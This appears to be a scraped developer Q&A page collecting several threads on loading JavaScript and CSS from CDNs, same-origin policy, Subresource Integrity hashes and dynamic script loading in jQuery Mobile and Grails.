content distribution network (CDN): Loading CSS or Javascript library

content distribution network (CDN): Loading CSS or Javascript library - javascript

I am using knitrBootstrap for some projects and I am beginning, to learn JQuery (Javascript) and CSS for some modifications of the generated pages. I also understand, that usually the CSS files and scripts are placed in separate files and loaded from the same domain (or locally) to an HTML document, but when I read the documentation of both libraries I see that they can be loaded from a CDN provider and that the generated HTML files from knitrBootstrap also do that.
E.g.: http://rawgithub.com/jimhester/knitrBootstrap/master/vignettes/illusions.html (lines 18-24)
<!-- jQuery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.10.3/jquery-ui.min.js"></script>
<!-- bootstrap -->
<link href=https://netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css rel="stylesheet">
<script src="https://netdna.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script>
This seems very nice since it allows to load static resources from a third party provider and spare resources on the own server when hosted. However, I was also a little bit concerned about the security (not exactly for my purposes but for webpages using this in general) and therefore searched about it. I found the concept of Same-Origin policy and from what I understand, the functions provided by JQuery should not be allowed to change the DOM objects of the page itself, but do it.
Why are the JQuery code and the Bootstrap CSS allowed to alter the remaining document even if they are not loaded from the same domain but from another (in this case a CDN)?

There is nothing stopping the CDN from replacing the files, and of more concern, there is nothing stopping someone else from replacing those files maliciously without the CDN being aware of it, except whatever unknown security measures are in place there.
The reason that the community is usually willing to ignore that potential flag is because of one huge benefit of CDNs: the ability for all users to use the exact same CDN for a given file. For example, imagine that every major site used the CloudFlare CDN link for JQuery. That means that when you, as a user, visit another major site that also uses it that you can save your own bandwidth by using a likely cached copy of the file. This of course brings up the other major point: the site is not wasting any of its own bandwidth serving up the file or handling requests for it.
However, getting to your question, the Same Origin policy does not apply to loading scripts or CSS; it applies to in-page requests (see: ajax) made by your scripts in order to try to avoid cross site scripting (XSS). The intent here is that you, as the site creator, should be in control of what scripts get loaded, but your in-page request may be easily trickable into making a cross-site request, thus potentially exposing data that should not be exposed (e.g., session variables). The key is that when the browser makes the request to the CDN, it does not give that CDN your session variables or any other cookies that it should not get (your domain's). However, once the script is able to be executing, it does have access your domain's cookies and it can forward those onto any other sites without the Same Origin policy in place.
Unlike Javascript, CSS does not actually execute code directly, rather it specifies a bunch of properties that have a visual effect on your page (which causes the browser to execute code to make it happen, including potentially downloading images used by the CSS).

Related

Subresource integrity and cache busting techniques in PHP

I'd like to implement Subresource Integrity and cache busting for static assets such as stylesheets and JavaScript files in my application. Currently I use PHP with Twig templates.
I know there are many tools out there to generate hashes for all the JS and CSS files but I am looking for how to implement the hashes into the <script> and <link> tags for hundreds of files.
This blog post described most of what I'm trying to do, however the author only covers cache busting and uses a static timestamp in the file name that he changes manually every time. Using a build tool to programatically generate that timestamp isn't difficult either but with SRI the value is a hash, which is different for every file.
For example, a snippet of header.html.twig:
<!-- cdn requests -->
<script src='https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js'
integrity='sha384-8gBf6Y4YYq7Jx97PIqmTwLPin4hxIzQw5aDmUg/DDhul9fFpbbLcLh3nTIIDJKhx'
crossorigin='anonymous'></script>
<!-- same-origin requests -->
<script src='foo.1a516fba.min.js'
integrity='sha384-GlFvui4Sp4wfY6+P13kcTmnzUjsV78g61ejffDbQ1QMyqL3lVzFZhGqawasU4Vg+'></script>
<script src='bar.faf315f3.min.js'
integrity='sha384-+vMV8w6Qc43sECfhc+5+vUA7Sg4NtwVr1J8+LNNROMdHS5tXrqGWSSebmORC6O86'></script>
Changing the src/href and integrity attributes every time is not a sane approach.
I could write a Twig function that calls a PHP function to hash the file every time and it may work on OK on dev but that seems awfully computationally expensive.
What is a feasible approach to this?

To answer your question: There is no feasible approach because this is not a proper application of Subresource Integrity.
According to W3C the integrity attribute is:
...a mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation
It was introduced because these days lots of pages are fetching their CSS and JS scripts from CDNs like you are and if a hacker were ever to gain control of a CDN they could wreak an extraordinary amount of havoc across thousands of websites by injecting malicious code into the resources delivered!
Imagine if every version of jQuery delivered by code.jquery.com or ajax.googleapis.com suddenly contained malicious code! How many sites would be affected? Scary.
By providing the agent (browser) with an integrity hash that the contents of the fetched resource should be compared against, you are ensuring the agent only continues to execute the code if it gets exactly what you told it to expect. If it's different, don't trust it!
In the case of the resources in your application, I assume they exist on the same server so there is no middle route to intercept. If a hacker gains control of your server and injects malicious code in the JS scripts, they could just as easily rehash the contents and change the integrity attribute in your HTML as well. Subresource Integrity offers no additional security check.
But...
Just for the sport of solving what is quite a fun problem I would suggest if you wanted to dynamically generate the hash for the integrity attribute:
Use Gulp (my personal preference) to concatenate, minify and thumbprint the filename of your resource. Read the contents of the generated file using gulp.src('bar.*.min.js'). Use the NPM sha1 package to create the hash as a variable and finally maybe use gulp-inject to change the src attribute and then gulp-replace to write the integrity attribute too. Some flow like that is what I would go for :-)
I hope that answers your question.

Why can't I load external scripts from outside servers while Modernizr.load can?

I keep having this doubt in my mind, I want to test if an URL exists before loading the script from that URL, but the way I'm trying to do it fails, as I'm using XMLHTTPRequests and as many know, when you use this method to GET a file from a server that it's not the same as the script that executes the GET, you will get back is not allowed by Access-Control-Allow-Origin .
So how come Modernizr.load() method can theoretically load the scripts and I cannot even see if there's actually something there ?

Because Modernizr.load(), like #dm03514 mentions, loads the script not through XMLHttpRequest, but by inserting a <script tag which doesn't have the cross-domain restriction. It then tries to check if the script loaded correctly, but that's not an easy task and it may not be possible in all browsers. For more detail you can see this recopilation of the support of different browsers for the various options available for checking success of loading scripts/css: http://pieisgood.org/test/script-link-events/
As for why XMLHttpRequest fails, you can read more about cross-domain restrictions at MDN: https://developer.mozilla.org/en-US/docs/HTTP_access_control
Some motivations for using script loaders are:
Loading scripts based on conditions like what yepnope and YUI do
Load scripts asynchronously for performance reasons ( tags block the rendering of the page).
Dependency injection (load resources that other scripts need, this is what requirejs does)
Load scripts when certain events happen (load hew functionality when a user clicks on a tab)
Also when you use script loaders, you usually load everything from them, including your application code, so that your application code has access to all dependencies. The require.js model (google AMD modules) is a great way of organizing your app. It allows you to write small modules that do specific tasks and reuse them, instead of one big file that does everything.

html5: a good loading approach?

I'm writing my first HTML5 + jquery.mobile web app.
The app is basically a menu which redirects to internal pages (data-role="page") defined in the same index.html. I do not write pages as external files to avoid reloading and rewriting the - substantially - same <head>: I suppose it's faster to jump to an internal tag than loading a new page...
Now, I have a page which needs some specific jquery plugins and some specific css. No other page needs these plugins or css.
Of course I could load these js/css in the main <head> section, but this approach would slow the first page loading, uselessly.
I could solve the problem with CSS, with:
$('head:first').append('<link rel="stylesheet" type="text/css" href="' + file + '" />');
I could even solve the problem with JS, but only for 'standard' JavaScript, with something like:
<script>
$(document).ready(function() {
$('#page-availability').live('pageinit', function () {
$.getScript("js/jqm-datebox.core.js");
$.getScript("js/jqm-datebox.mode.calbox.js");
$.getScript("js/jquery.mobile.datebox.i18n.en.utf8.js");
$('#datepicker').data({
"mode": "calbox",
...
});
...
});
...
});
Unfortunately this approach seems not to work (firebug croaks: "TypeError: a.mobile.datebox is undefined"...) with jquery plugins: it looks like they are not evaluated... (even if they are there, before the end of the <head> section, viewing at the "Generated Source"...).
I'm using Firefox (15) to debug, but I suppose this isn't the point...
Any hint?

The one page approach can be good for mobile if:
You don't have to load too much extra content in order to support all the content the user might show from that one page.
You don't have to load too much code to support all the behaviors.
The typical user actually does go to several different virtual pages so the scheme saves them load time and makes things quicker on subsequent virtual page loads.
Done well, the user gets OK performance on loading the first page and very quick performance when going to the other "embedded" pages that don't have to load new content over the network.
The one page approach is not so good if:
The initial load time is just more than it's worth because of the volume of stuff that must be loaded.
You have to dynamically load content for the sub-pages anyway.
You have SEO issues because the search engine can't really find/properly index all your virtual pages.
So, in the end, it's a real tradeoff and depends very much on how big things are, how many things you're loading and what the actual performance comes out to be. A compact mobile site can serve server-loaded page views from one page to the next pretty quickly if the pages are kept very lightweight and there are very few requests that must be satisfied for each page.
In general, you want to pursue these types of optimizations:
Compress/minify all javascript.
Reduce the number of separate items that must be loaded (stylesheets, javascript files, images).
Reduce the number of sequential things that must be loaded (load one, wait for it to load, load another). Mobile is bad at round-trips and loading lots of resources. It's OK at loading a few things.
Make it easy for the browser to cache javascript files. Use a few common javascript files that each serve the needs of many pages. Loading a little more at the start and then allowing the javascript file to be loaded from cache on all future pages loads is way, way better if the user will be visiting many successive pages on your site. The same is true for external CSS files.
Very very careful of lots of images, even small images. Lots of http requests in order to load a page is bad for load time on mobile and every image you request is an http request (unless it comes from the browser cache).
Make sure your server is configured to maximize browser caching for things that can be effectively cached.
Other things to be aware of:
By default dynamic loading of script files is asynchronous and unordered. If your script files must execute in a specific order, then you will have to either not load them dynamically or you will have to write code (or use a library) that serializes their execution in the desired order.

$.getscript is a shorthand AJAX function, it takes a callback as the second parameter.
Check out the docs:
http://dochub.io/#jquery/jquery.getscript
You could concatenate those scripts and then do your stuff in the callback.

This is not so dissimilar to old Flash asset loading issues.
My strategy for that? load only whats necessary for the initial page view. When its loaded and the page / app is viewable by the user, progressively load all other assets.
If the assets were particularly heavy, then I would disable the link to that specific page until its required assets were loaded.
In this case, you might disable the link to the particular page at the outset, initiate the load of its assets, and when they are ready, enable the link.
Not sure if you're having any syntax issues, but you can certainly just inject a new script element into the head with the correct source, and it will instigate a download (like you are doing with css. But you probably know that ;D )
Cheers

I would just combine/minify and compress all the JS in one file and always load that. This is something (with correct caching) which is only downloaded once so you don't have to worry about performance much.
Of course I could load these js/css in the main section
I often just add it just before the </body> and tag. Also note that besides the fact that .live() is deprecated it is also slow as hell. So don't use it, but use .on().

grails specifying javascript library

In my grails app, we use jquery. I include jquery on the necessary pages with
<g:javascript library="jquery"/>
If we decide to change javascript libraries, I need to update every page. I know I can include this in the layout, but the library is not needed on every page, so that seems wasteful.
Is there a typical way in grails to specify in one place what the default javascript library should be and then to just include that default one without specifying that it is jquery (or whatever it is) on every page?

Since most browsers heavily cache things like JavaScript libraries, putting the library include into the layout is probably better than putting it in each individual page. The heavy caching that browsers do means that users will only load the library from the server once for your whole site (or at least their browsing session), and by having it be handled in the layout you are drastically reducing your maintenance load (which you alluded to)
In general, your JavaScript libraries should be highly cached, and in many cases it's preferable to pull them from a highly used CDN, like Google's. Your "local" (ie. from your server) library should only get requested if the CDN provider goes down and the browser can't get to their library. (Take a look at the HTML5Boilerplate project for how this is done)
Because of that, I wouldn't worry about the very minimal performance hit that putting the library into the layout page would incur. Even if you don't use a well-used CDN for your library, any browser that people actually use today will only load your JavaScript library once (the first page it gets that includes it) and will simply use it's cached copy for the rest of the pages on your site.
So, in a nutshell, put it in the layout page and don't worry about it. It will only be requested on the first page load, and will come from the cache for all subsequent loads, and your codebase will be DRYer.

You could also create an external JS file that selectively loads the file(s) you specify. Something like this:
//FILENAME: jselector.js
if ( [conditions] ) {
var fileref=document.createElement('script');
fileref.setAttribute("type","text/javascript");
fileref.setAttribute("src", filename); //reference your Jquery file here
document.getElementsByTagName("head")[0].appendChild(fileref);
}
Then put a reference to this file (jselector.js) in each of the pages that need it.
<script type="text/javascript" src="jselector.js"></script>
If your jQuery file ever changes, you update this single external JS (jselector.js), and all of the pages will automatically point to the new jQuery.

How to determine if a javascript was already loaded by other html file

How to determine if a javascript was already loaded by other html file? I want to reduce the redundant loading of the javascript files to decrease the loading time of my webpages.

If your web server is providing correct caching headers this shouldn't be necessary, the browser will cache the javascript file across multiple requests.
You might want to check out the YDN page Best Practices for Speeding Up Your Web Site

If you want to prevent the files from being downloaded twice then this will be automatic provided they are set to be cacheable (most webservers should set these headers sensibly by default).
If you want to make sure that the include tag happens only once when including files in a dynamic language then you will need some sort of manager. ASP.NET provides a scriptmanager class that does this (among other things). I cannot speak for other languages and frameworks

As Rory says the second request will probably be cached, and noting that this is a bit of a design failure if it can happen, you can understand that the cached file is still going to execute with negative effect.
This is horrible, but you could wrap your JS script like this:
if (!document.foo)
{
//your script here
document.foo = true;
}

We Keep Coding

JavaScript is the programming language of the Web.